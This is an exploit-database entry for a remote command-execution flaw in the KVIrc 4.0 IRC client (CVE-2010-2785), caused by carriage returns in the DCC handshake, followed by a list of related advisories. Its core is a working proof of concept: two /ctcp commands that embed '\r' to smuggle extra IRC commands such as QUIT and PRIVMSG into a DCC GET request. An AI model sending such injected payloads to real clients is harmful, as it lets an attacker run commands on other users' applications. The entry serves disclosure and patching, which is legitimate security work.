Lucene search
Unic0rnEDB-ID:34385HistoryJul 28, 2010 - 12:00 a.m.
KVIrc 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution
2010-07-2800:00:00
unic0rn
www.exploit-db.com
14
source: https://www.securityfocus.com/bid/42026/info
KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to execute arbitrary commands within the context of the affected application.
KVIrc 4.0.0 is vulnerable; other versions may also be affected.
/ctcp nickname DCC GET\rQUIT\r
/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r Related
nessus
nessus
Fedora 12 : kvirc-4.0.0-3.fc12 (2010-11524)
2010-08-02 00:00:00
openSUSE Security Update : kvirc (openSUSE-SU-2010:0459-1)
2010-08-03 00:00:00
openSUSE Security Update : kvirc (openSUSE-SU-2010:0459-1)
2010-08-03 00:00:00
debian
debian
openvas
openvas
Debian: Security Advisory (DSA-2078-1)
2010-08-21 00:00:00
Gentoo Security Advisory GLSA 201402-20
2015-09-29 00:00:00
securityvulns
securityvulns
kvirc IRC client multiple security vulnerabilities
2010-08-14 00:00:00
nvd
nvd
CVE-2010-2785
2010-08-02 20:40:01
ubuntucve
ubuntucve
CVE-2010-2785
2010-08-02 00:00:00
cve
cve
CVE-2010-2785
2010-08-02 20:40:01
debiancve
debiancve
CVE-2010-2785
2010-08-02 20:40:01
gentoo
gentoo
KVIrc: Multiple vulnerabilities
2014-02-21 00:00:00
prion
prion
Design/Logic Flaw
2010-08-02 20:40:00
cvelist
cvelist
CVE-2010-2785
2010-08-02 19:00:00